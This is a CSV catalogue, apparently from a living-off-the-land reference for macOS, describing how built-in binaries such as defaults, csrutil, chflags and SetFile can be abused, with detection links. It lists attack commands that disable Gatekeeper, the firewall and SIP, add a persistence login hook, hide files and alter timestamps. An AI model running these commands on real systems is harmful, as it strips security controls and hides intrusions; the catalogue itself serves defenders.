"name","author","short_description","full_description","created","example_use_cases","example_use_cases_name","example_use_cases_description","example_use_cases_code","example_use_cases_tactics","example_use_cases_tags","paths","detections","detections_name","detections_url","resources","resources_name","resources_url","acknowledgements","is_legit"
"defaults","Brendan Chamberlain (@infosecB)","Read, write, and delete user preference values.","The defaults binary is normally used to interact with the user defaults system, a database of macOS used to manage system settings much like the Windows Registry. The database can be abused by threat actors to change settings in attempt to evade defenses or to gain persistence.","2023-05-24","","[''Disable Gatekeeper's auto rearm functionality''-|-''Show mounted servers''-|-''Add a login item to the current user''-|-''Get Active Directory user info from Jamf Connect''-|-''Enable Firewall''-|-''Disable Firewall'']","[''The following command can be used to disable Gatekeepers rearm functionality. This command requires root privileges.''-|-''Show all mounted servers on the desktop.''-|-''An attacker can use defaults to add a login hook in attempt to gain persistence. This command requires root privileges.''-|-''Retrieve Active Directory user info from Jamf Connect defaults configuration.''-|-''Enables macOS' default firewall. This command requires root privileges.''-|-''Disables macOS' default firewall. This command requires root privileges.'']","[''sudo defaults write /Library/Preferences/com.apple.security GKAutoRearm -bool NO''-|-''defaults read com.apple.finder ""ShowMountedServersOnDesktop""''-|-''sudo defaults write /Library/Preferences/com.apple.loginwindow LoginHook gain_persistence.sh''-|-''defaults read com.jamf.connect.state''-|-''sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 1''-|-''sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0'']","[''Defense Evasion''-|-''Discovery''-|-''Persistence''-|-''Discovery''-|-''Defense Evasion''-|-''Defense Evasion'']","[''gatekeeper''-|-''firewall''-|-''firewall'']","/usr/bin/defaults","","No detections at time of publishing","N/A","","[''macOS defaults list: Uncomplete list of macOS defaults commands with demos''-|-''Insistence on Persistence'']","[''https://macos-defaults.com/''-|-''https://www.huntress.com/blog/insistence-on-persistence'']","","false"
"csrutil","Megan Carney (https://infosec.exchange/@PwnieFan)","Configure or view system security policies.","Used to enable/disable SIP, configure netboot and authenticated-root settings","2023-05-14","","[''Disable SIP''-|-''Disable authenticated-root''-|-''Add a netboot server''-|-''Map infrastructure''-|-''Determine if SIP is enabled'']","[''disable SIP (System Integrity Protection) - requires booting into recovery mode''-|-''When authenticated-root is disabled, booting is allowed from non-sealed system snapshots - requires booting into recovery mode''-|-''Insert a new IPv4 address in the list of allowed NetBoot sources''-|-''List allowed NetBoot sources''-|-''Determine if System Integrity Protection is enabled'']","[''csrutil disable''-|-''csrutil authenticated-root disable''-|-''csrutil netboot add <address>''-|-''csrutil netboot list''-|-''csrutil status'']","[''Defense Evasion''-|-''Defense Evasion''-|-''Defense Evasion''-|-''Reconnaissance''-|-''Discovery''-|-''Discovery'']","[''users''-|-''users''-|-''configuration''-|-''configuration'']","/usr/bin/csrutil","","[''Sigma: System Integrity Protection (SIP) Disabled''-|-''Sigma: System Integrity Protection (SIP) Enumeration'']","[''https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml''-|-''https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml'']","","[''Discussion on how SIP interacts with bless and netboot''-|-''MITRE ATT&CK T1518.001 Software Discovery: Security Software Discovery''-|-''The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSSBackdoor Planting in Safari, and LeveragesTwo Zero-day Exploits'']","[''https://developer.apple.com/forums/thread/4002''-|-''https://attack.mitre.org/techniques/T1518/001/''-|-''https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf'']","","false"
"codesign","Thijs Xhaflaire","Create, manipulate and verify code signatures.","The codesign command is used to create, check, and display code signatures, as well as inquire into the dynamic status of signed code in the system.","2024-07-29","","Ad-hod codesigning an app bundle","This command forcefully re-signs the MyApp.app application with an ad-hoc signature, applying the signature deeply to all nested code within the app","codesign --force --deep -s - MyApp.app","Defense Evasion","codesign","/usr/bin/codesign","","Jamf Protect: Detect ad-hod codesigning activity","https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/adhoc_codesigning","","[''When Apple Admits macOS Malware Is A Problem – It’s Time To Take Notice''-|-''codesign man page'']","[''https://www.sentinelone.com/blog/when-apple-admits-macos-malware-is-a-problem-its-time-to-take-notice/''-|-''https://ss64.com/mac/codesign.html'']","","false"
"chflags","demonduck","Changes file or directory flags","The chflags utility modifies the file flags of the listed files as  specified by the flags operand.","2024-07-25","","[''Hide a file''-|-''Remove hidden flag'']","[''Add the hidden flag to a file or directory to prevent it from being  visible in Finder and Terminal.''-|-''Remove the hidden flag to a file or directory to make it visible in Finder and Terminal.'']","[''chflags hidden ~/evil''-|-''chflags nohidden ~/evil'']","[''Defense Evasion''-|-''Defense Evasion'']","[''finder''-|-''finder'']","/usr/bin/chflags","","Sigma: Hidden Flag Set On File/Directory Via Chflags","https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml","","[''chflags man page''-|-''macOS/binaries/chflags''-|-''How to hide files and folders'']","[''https://ss64.com/mac/chflags.html''-|-''https://macosbin.com/bin/chflags''-|-''https://eclecticlight.co/2024/07/03/how-to-hide-files-and-folders/'']","","false"
"caffeinate","Ethan Nay","Prevent the system from sleeping on behalf of a utility.","caffeinate creates assertions to alter system sleep behavior.  If no assertion flags are specified, caffeinate creates an assertion to prevent idle sleep. If a utility is specified, caffeinate creates the assertions on the utility's behalf, and those assertions will persist for the duration of the utility's execution. Otherwise, caffeinate creates the assertions directly, and those assertions will persist until caffeinate exits.","2023-07-12","","[''Fork a process''-|-''Prevent a sleep'']","[''Make caffeinate fork a process and hold an assertion that prevents idle sleep as long as that process is running''-|-''Prevent a macOS from going to sleep for 4 hours (14400 seconds)'']","[''caffeinate -i /tmp/evil''-|-''caffeinate -u -t 14400'']","[''Execution''-|-''Defense Evasion''-|-''Execution'']","[''bash''-|-''zsh''-|-''bash''-|-''zsh'']","/usr/bin/caffeinate","","No detections at time of publishing","N/A","","[''macOS/binaries/caffeinate''-|-''caffeinate man page'']","[''https://macosbin.com/bin/caffeinate''-|-''https://ss64.com/osx/caffeinate.html'']","","false"
"SetFile","Chris Campbell (@texasbe2trill)","Set attributes of files and directories.","Uses the CommandLine/Terminal to set file and or directory attributes. It can set attributes, creator, creation date, modification date, and file type for multiple files at a time.","2023-04-23","","[''Set a file or directory attribute to invisible''-|-''Change a file's creation and modification timestamps'']","[''A bash or zsh oneliner can allow an attacker to set the file attribute to invisible. This action can establish persistence and evade detection for malicious files on the system.''-|-''Setfile can be used with the -d and -m arguments to alter a file's creation and modification date, respectively.'']","[''for FILE in ~/*; do echo $(SetFile -a V $FILE && echo $(GetFileInfo $FILE)) >> /tmp/fileinfo.txt; sleep 2; done''-|-''SetFile -d ""04/25/2023 11:11:00"" -m ""04/25/2023 11:12:00"" targetfile.txt'']","[''Persistence''-|-''Defense Evasion''-|-''Defense Evasion'']","[''bash''-|-''zsh''-|-''oneliner''-|-''bash''-|-''zsh''-|-''oneliner'']","/usr/bin/SetFile","","No detections at time of publishing","N/A","","The Invisible Bit","https://daringfireball.net/2008/04/the_invisible_bit","","false"
"GetFileInfo","Chris Campbell (@texasbe2trill)","Get attributes of files and directories.","Uses the CommandLine/Terminal to return type, creator, attributes, created, and modified file information of a file or directory.","2023-04-23","","Iterate through a directory to GetFileInfo","A bash or zsh oneliner can provide an attacker with information about specific files of interest.","for FILE in ~/Downloads/*; do echo $(GetFileInfo $FILE) >> fileinfo.txt; sleep 2; done","Discovery","[''bash''-|-''zsh''-|-''oneliner'']","/usr/bin/GetFileInfo","","No detections at time of publishing","N/A","","macOS/binaries/GetFileInfo","https://macosbin.com/bin/getfileinfo","","false"
